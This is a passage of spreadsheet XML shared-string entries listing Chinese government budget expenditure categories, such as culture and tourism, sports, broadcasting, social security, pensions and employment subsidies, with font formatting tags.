      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>艺术表演团体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化活动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>群众文化</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化和旅游交流与合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化创作与保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化和旅游市场管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>旅游宣传</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化和旅游管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他文化和旅游支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文物</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文物保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>博物馆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>历史名城与古迹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他文物支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>运动项目管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体育竞赛</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体育训练</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体育场馆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>群众体育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>体育交流与合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他体育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新闻出版电影</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>新闻通讯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>出版发行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>版权管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>电影</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他新闻出版电影支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>广播电视</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>监测监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>传输发射</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>广播电视事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他广播电视支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>宣传文化发展专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>文化产业发展专项支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他文化旅游体育与传媒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保障和就业支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人力资源和社会保障管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>综合业务管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>劳动保障监察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>就业管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保险业务管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保险经办机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>劳动关系和维权</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共就业服务和职业技能鉴定机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>劳动人事争议调解仲裁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>政府特殊津贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>资助留学回国人员</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>博士后日常经费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>引进人才费用</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他人力资源和社会保障管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民政管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会组织管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政区划和地名管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基层政权建设和社区治理</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">   老龄事务</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他民政管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>补充全国社会保障基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>用一般公共预算补充基金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政事业单位养老支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>行政单位离退休</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>事业单位离退休</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>离退休人员管理机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机关事业单位基本养老保险缴费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机关事业单位职业年金缴费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对机关事业单位基本养老保险基金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对机关事业单位职业年金的补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他行政事业单位养老支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业改革补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>企业关闭破产补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>厂办大集体改革补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他企业改革发展补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>就业补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>就业创业服务补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>职业培训补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保险补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公益性岗位补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>职业技能鉴定补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>就业见习补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>高技能人才培养补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>促进创业补贴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他就业补助支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>抚恤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>死亡抚恤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>伤残抚恤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>在乡复员、退伍军人生活补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>义务兵优待</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农村籍退役士兵老年生活补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>光荣院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
